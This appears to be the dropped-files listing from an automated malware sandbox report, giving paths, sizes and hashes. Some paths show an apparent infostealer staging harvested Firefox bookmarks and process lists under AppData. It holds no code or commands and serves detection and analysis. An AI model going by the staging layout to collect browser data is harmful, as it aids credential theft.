SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
Filesize
96KB
MD540f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1d6582ba879235049134fa9a351ca8f0f785d8835
SHA256cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Local\b83720fa57fc44bf7e50dadcdfda3d1b\Admin@FRAVVDAE_en-US\Browsers\Firefox\Bookmarks.txt
Filesize105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
C:\Users\Admin\AppData\Local\b83720fa57fc44bf7e50dadcdfda3d1b\Admin@FRAVVDAE_en-US\System\Process.txt
Filesize4KB
MD52f9eed8f78974a12ea6ae9d12f59c3da
SHA1aa0755efcb25025b1bd472a4fe845fa6293b2a02
SHA256263fef4035e96f4d1aaa3a9d1f3acfbedf2d5e7bc1817eda589616f93c65eef6
SHA512e0dabe748620c25a0594b11405eb75c350f16299010f9ee5948d84f0849943c665c16dabc920b7f5046b97db2d0cca9a62411ada670e583af7fdd9bd9d25125b
-
C:\Users\Admin\AppData\Local\f51ce65e43e0d0df799cde3f2477c9f6\Admin@FRAVVDAE_en-US\System\Process.txt
Filesize4KB
MD595961c864dec3f7abc7bff78174ba4fb
SHA13dbbbd8e1cb83db5bb29f6193c0419354b88bb36
SHA2569d0417c7e0dbca4c5a36c028e4f3461416e46c243b5ca41ac897c09df22cdba8
SHA5123e745608f71a8261abd837078c0819258f1329484f01093941ea0d764d792c50414d4c1ca2f5a746878a7933e0db54c56883093221146cf757c81ef03e03d9b1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\AlternateServices.bin
Filesize7KB
MD589f33691fed4a91159ed65db2f494fa1
SHA16443fd1f577e255b25f327129fa3e4d1fd867690
SHA256f3e9f882bce426b1df7dfc221b36bbda8749ac9cfe3aec89900ad5c5a7c1e72c
SHA51257a9ecafbfde867ba7edab37e55a08eec9ef8c93c04f6040313811eb072c5ce856e3ff66668c0b51c7d07f859ffba1b4535b172ed7e914677a2c55d771cf6381
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\AlternateServices.bin
Filesize11KB
MD5d4bd8378d49e303cfffc8fd59f0a700e
SHA17066ea0b0cf381c1856133b4ce96c86817250635
SHA256487de6f7e73980c79612cb79955e7b7b70ffa13ff77efd1b31b573dea1295095
SHA51222fb0cac9511b3c0d951dd47dbfacc5248ec487223dc1628976e6e9f1762ecc2b1d50d9bafa4cb5022988501e23dfd5b949b7f91747c3190d426d5c74ac619a4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\AlternateServices.bin
Filesize17KB
MD5b56c862686e7a08cdf5b62d5b8604dfd
SHA1589f907cfd199495d31e59aee45652763310c6f7
SHA25633c44ce1cc3f3db68fe91ad4810d302c0ad173ffa5454431287ead36b6730015
SHA512f1395d09bc9275114f688d7bdce839e8f2c901b29051d8eee52ebf4edb7d3c094d7227ac12ab0c736fde1997c00a93c551351e5795e28b1957e6f2444c935c1c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.bin
Filesize15KB
MD5127e7672f714db45946523cd8573d7d9
SHA12b0de7888c2a0646bcc84bb9acdd5df69e748184
SHA256fd7e0bb273c91a000520bf5219db4d0ee50700ad70c7b3003b2f0d007eb0e297
SHA512b48944ab05e8c286018c8665f3ee6050c3a06af42dbd3bdc1d9818652816da0f25d43b8b431765481a75ef4c8a19b4e173eb1f7ed9fc08e2497c801a77271ac1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.bin
Filesize6KB
MD523484eabad2489b27a1cd0b17334910c
SHA160393319ee0b094b337569f1b827dd19a34e5d94
SHA25660d663472dc805fb872938a82b3c68dcd701f519fa4781ce70688a2d2c1fd507
SHA512706a83f88861c5685d72156b18686fa87b8471776aa124212a2b94e53f7d4067228bf5f09489e431db5483392ae5d75cd593133afd7c1d29c915f78b31af095d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.bin
Filesize15KB
MD53ac131ebd359935aa02b78754046da07
SHA18d191e9fe649c385f308214a87d5178ee19c8f60
SHA2567f14548f846beb7721a0c38552f6e1834e3f6a8ab37bb4bef91ea93c73150cdf
SHA512fe640c98d6cc50ff7f0c96b12139ac8408385878ff5dcb048faf70e355a53acb898525f8ba763a2514b198cdb7fadcbab4f30b2e94584b30241ad99be682e9e9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.bin
Filesize23KB
MD55c2c3d0cd5e5b30b9d53ac44ff15e559
SHA172aa217bcdff7b00eb80bef894d69e2f8154cb9a
SHA2563ddb87607975afb4637e1dfb6179599a8b7e33d2beaf8338a2f9e41acc28e50e
SHA512fad973ec8d6ca5a37babac767fe49d4066a09e93aea6dcb7be63899d395f025424288b7fca281d077b3ce12d50befaabb69ac795e1af69e1aa57f3f9c80e202e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.bin
Filesize5KB
MD5e40ab72f216aa664982a6d26689c913c
SHA1daa4a85275c7677e3fd1c9b387ca1ee3b50619ff
SHA2563e01b5ed43c9dd80a73ba1929d55831fef3391c98a792977b20c7ecf78e7af65
SHA5122edc383cf8cd1e95dee0561cb4a4ec484fe1e1e2add148f42ef689f712458542f31dcd6620d4cdde2dd5c04c7b8ef648f70a3f060f8ef8ecba62db19ed2a6e81
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5609da13e9bebe09679ada3e8bf35b68a
SHA1201a0a9b228f475c0e75606464315ad86224801f
SHA25678ec49429d0d283b017887f9445c3f0bd715d4674551c8260b17e510258d52aa
SHA512bab2877e921e53af0a40d1b1698e595f125fc95521cea789c2d7070004f1bbe0f024896503ef2cc9a833a4b106b6eb8a399d7bd68793d9d50cf6b4b73139af70
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5d004cddb2333c85e963fee084d893daa
SHA1cb272211cb1ab4812a73e459905b04d4ddb3f266
SHA25632653fbca2eaa65f7cc0d2a51a984403e3bf36f92189e0cd6ee953a160794c5c
SHA5129ebc202c287f5d83d34c62a7c2333036ac818434e81fa86135092a68f9c58b3a3edafdb9c52b6d259029fc4e1ad2f9b1ee29afee84eb2ce57c83d606d6000651
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5c092230c83dcd72104cb0a61302d254d
SHA1f84e58a746670138116f8d544bbef9fa0b0e8021
SHA256ba27de25c4892fe20f18fd60d60105ca987ad11e80ed9143fd9fbf283016f24b
SHA512f9192d0f6399c99b96fc6050d7e4928263d864a809d0896fc34dda85e39d0ae65f39adc49e5ddc8e8428be7485f2c4a182c726cb5d52e2bbf604bd64b605c769
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5ad0e6aa5d5ab235b69e700db708529fc
SHA111b786384456b54a6d16fc555f4c19078ee6ac93
SHA256108e963131025cc9b0aee82903f2bcaa405153b084c82ea9f4bbab02887b2256
SHA51283e153ba81205686197e1f20b6fd2414f0302db5dca58f50d859db9d5eea51c95130408a015960ceb9e270f2e1a0dca62194ad5523ec6914ec041bb03f16af53
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD506d0da1cf7bec3cd2628068fa498808a
SHA1c580412b6ea72d3da42d91117f1705c053d864cd
SHA2565f261fbf2abf7c48598d498777c1f96b9e905a395a0bbec899be87a029b10078
SHA51230709e4ceabb6a737eeb4659602bd4db2a41483eea8b613651f328f28c28bacc6563eb5bf43997e8d940e00159c3e53202c19159b3ce97b075a2f5092c2830d1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD59da00e27042ae04680a80e630d574950
SHA1bb21d41e7946e953c7fca90c05e35de43ff528db
SHA256501292ed14a2fe07bbbcc75bf11bb6a616e2c10666d2981d8efc3877c21764da
SHA51235ecc8bc7932d66f2fa50e25805582225d2d2b4c21260b15cc2f123bf6e743e3d60790361a9730b0d008fb4b57b489e4e2cecd8df4e31427ede3fe8938efadf2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD5416c286e4adbea7b6011d4a8dfea1ad2
SHA1cb2c76bc66a4a72dbc783d185ab4d4b620f8716d
SHA25612a200c1813a0d12c530e9eed39771106c8a333f0d8f28ee23c6c8544782143a
SHA512ed6cca3765c1ba1c25831d832a58de6c1d1e9fa6285e9f0e85ef8a70ccbe01c81f2a2f2671eefe4e25c6c90e1d7f51228ac5e507f75fa707cd16c692c2fa2df2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\pending_pings\4e5ec389-bac8-490c-9452-ec1aeaf20da4
Filesize982B
MD55005985ab3765f4c4cde01430173b8bd
SHA1ab595c17e0654a6c955a41c03a07b072b89126c7
SHA25688e341301a2f737641d8036735c23a6f5d1cdcef00bb8f45240b70e1febf2384
SHA5127dde07770e86bea553e2227d227cec0a617c936fd4f0e3bc8d44efc4b8a4ce845e648a1173d9c0eca0e23e224990a409f22bfbdf149e1d339999433a4eebe816
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\pending_pings\a84e5bb1-9123-450c-b728-f1c332e2e149
Filesize671B
MD571624543574baf72efa224000591c7e8
SHA17cec93ee4c592b7b88bd368a2a961a158bf5a6d7
SHA256958fefeedc33bdbc21921b4fd7290b8342da6c11e692c37ff12efad4fca8a91f
SHA51201f1ed97a8954ba47e8d16515b802832e90f2a196d434f3042447636d1c8b03beafa704649534193749d1920b78af875bde890781e2a51ad447f597605c05134
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\pending_pings\c3b4e90a-169b-45a6-b6a4-3e58506d5037
Filesize28KB
MD532f2e74baae20ae3c0e540ad54705451
SHA1675a2c649cc7cf155114642b0f07215d86ea4f55
SHA2563f30f96fcd0937ae9aeb2222ab0ffb61286078b3d17ae99c6fe06248a6b9b606
SHA512d17bcba9a1cfc301f88851f05eb49b2f45a8f80def7ab3d2d09fca1ed7da78e0e7e2f8c320974fe3079da5f6db937dbe6f49770e7a805c479f45bf9b1e847be3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
9KB
MD5e1cc935f90ecd798ec2e71f2036ebd80
SHA141f8e4f85cfec2532c043f3c8a0144b6d456806c
SHA2564dace86382cd8f393073cfabf75a69758f78657b246f01cd6742fd9c0433e8d7
SHA5124d1e9c3d16e7622809e573258cee7845915dacbe6eacc130248cd16bcda340615b2044e2bf8e044d4b3bfda380e5f212f4f1c54c211c302dbc3726ff06bac14a
-
Filesize
10KB
MD5ae4161215ebeb3fee91d67714dae587f
SHA174934e0282f96f0f64119b6a6d5a8c545a1221f4
SHA25654f1ab87f9e03decb101772846a25b97572c0aefba3bf3a912b6ddad6b4749ea
SHA512d6af43d9b10dff7fe22fd6d078161d886da2215519e7050cb472a1f55edf37c23b661875ad87c376e8ce463ed794e6c9a9c0ff26050aaeda7493d97684e5fa28
-
Filesize
12KB
MD5c5a90c7bca99d4ad10b09a3a8dda3cbe
SHA139ab912dd933c6dfeae85f72718418fda529ae65
SHA256084b2f98c1d6e8c9218a8c8b66e73bc40f3be14180dae24a12c18e084d3be5ed
SHA512106ec206545dea50fffaaeef4eedc03c3f245db6e4031a76648f2f9fd5fd5f32c7628c465e4382446ddf4650c358d055e2dae015588191658a7d4afeaaf44b6d
-
Filesize
11KB
MD5b2ad9eebfd96188aae488e1f5e8db6da
SHA15687be2ee07dff95ff51175418a525da10384e3b
SHA25630c85ab34f92806cb32858147a2c359fb548d41c22f8d1525bd7ac2bbc307910
SHA5125c48a1e429bb30fc28c44c5ed35c2e5f660e17551d4e78d66b1ad5b2514506e6746e40ba910d7b66064a05d6f215425cf4536175517c27c08fabd14cca3e2c9f
-
Filesize
9KB
MD5580e2fca8319646366e0a00640fcb70c
SHA141ef5c52d5c9fe349d963aaeeb9bd60ae7f1c65c
SHA256ee045f84a87ead56df456a673d676e8b9b97d24496f8b23abe6942661f5b0545
SHA512f23b723bd71d9be36ab9fd6af8abb1ec6cb3df34d0a8773559e0b363b394d91538e3d3eb18e40b592323d08939d21e1c3499777da5eb7f36b45b1c1dfe1322c9
-
Filesize
9KB
MD564997d39a2bbcb697ca3f4908dc06f43
SHA18db8c7a3220ab3b16c71a6119b88aa26ed98f78c
SHA256aa8b81e9addf9f8ec1c8c012ac422d6e1ea3aeea88a8951f16f5dbe90d185ced
SHA5126611ea747d5cffcb4a9d5ec9e98a045ee8e00f0fad8287492955cf644b640e7bfe4273ddb3b7ccc17deca4b5b92e8bed73502f54489265fe1ce021ecca7a672a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize8.7MB
MD5599f08e2349f1906afe1e88be9c7079c
SHA1f0a539df0c530f405cfc8264b2f2aeb40edfc9ae
SHA25607ec51148cb5d1decd8ec19d43d905bbe3fe2f78f743d8c9aaf297fff9a3610a
SHA5125c63fe96557d3ee0dd9f959a43c8fee0f71ce950bd0cd546d4c72c591a3a88acd726f8df39756e68d7994fb92594f56528eef465501bb54a94fce34f46b4ec23